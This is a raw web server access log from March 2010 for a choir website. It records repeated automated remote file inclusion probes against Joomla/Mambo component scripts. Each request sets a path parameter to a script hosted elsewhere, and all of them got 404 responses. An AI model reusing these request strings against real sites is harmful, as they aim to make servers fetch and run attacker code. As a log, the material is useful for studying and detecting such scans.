164.77.228.201 - - [09/Mar/2010:08:07:43 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:08:31 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:08:31 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:08:36 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:08:09:38 -0800] "GET /logs/access_100126.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:52 -0800] "GET /logs/access_091213.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:53 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.15.158.246 - - [09/Mar/2010:08:09:53 -0800] "GET /logs/access_100126.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://0919f.com//shop/data/log/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.americanboyschoir.com"
64.15.158.246 - - [09/Mar/2010:08:09:53 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://0919f.com//shop/data/log/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.americanboyschoir.com"
64.15.158.246 - - [09/Mar/2010:08:09:53 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://0919f.com//shop/data/log/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:53 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:56 -0800] "GET /logs/access_091213.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:56 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:56 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:58 -0800] "GET /logs/access_100117.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:58 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:58 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:09:59 -0800] "GET /logs/access_100117.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:10:00 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:10:03 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:10:38 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:10:38 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:10:55 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:10:55 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:10:57 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
64.15.158.246 - - [09/Mar/2010:08:11:22 -0800] "GET /logs/access_100112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://0919f.com//shop/data/log/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:11:33 -0800] "GET /logs/access_100209.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:11:34 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:11:34 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:11:42 -0800] "GET /logs/access_100209.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:11:42 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:11:43 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:52 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:54 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:11:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:08:12:05 -0800] "GET /logs/access_100202.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:06 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:06 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:10 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:10 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:12:18 -0800] "GET /logs/access_100130.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:08:12:22 -0800] "GET /logs/access_100130.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:31 -0800] "GET /logs/access_100205.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:32 -0800] "GET /logs/access_100205.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:37 -0800] "GET /logs/access_100205.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:46 -0800] "GET /logs/access_100205.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:53 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:53 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:12:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:02 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:14 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:13:16 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:08:13:54 -0800] "GET /logs/access_100202.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:08:14:28 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:08:14:28 -0800] "GET /logs/access_100228.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:08:14:28 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:14:30 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:32 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:32 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:32 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:14:35 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:14:36 -0800] "GET /index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:37 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:37 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:37 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:38 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:38 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:14:38 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:14:39 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:14:39 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:14:39 -0800] "GET /logs/access_100129.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:14:39 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:14:39 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:14:39 -0800] "GET /logs/access_100129.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:14:45 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:14:49 -0800] "GET /logs/access_100205.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:14:55 -0800] "GET /logs/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:14:55 -0800] "GET /logs/access_100117.log/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:08:14:58 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kecschool.co.kr/upfiles/s041/.../id4.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:08:15:02 -0800] "GET /logs/access_100214.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kecschool.co.kr/upfiles/s041/.../id4.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:08:15:02 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kecschool.co.kr/upfiles/s041/.../id4.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:08:15:02 -0800] "GET /logs/access_100116.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kecschool.co.kr/upfiles/s041/.../id4.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:08:15:29 -0800] "GET /xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:08:15:29 -0800] "GET /logs/access_100115.log//xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:08:15:29 -0800] "GET /logs/access_100214.log//xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:08:15:29 -0800] "GET /logs//xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:15:38 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:15:38 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
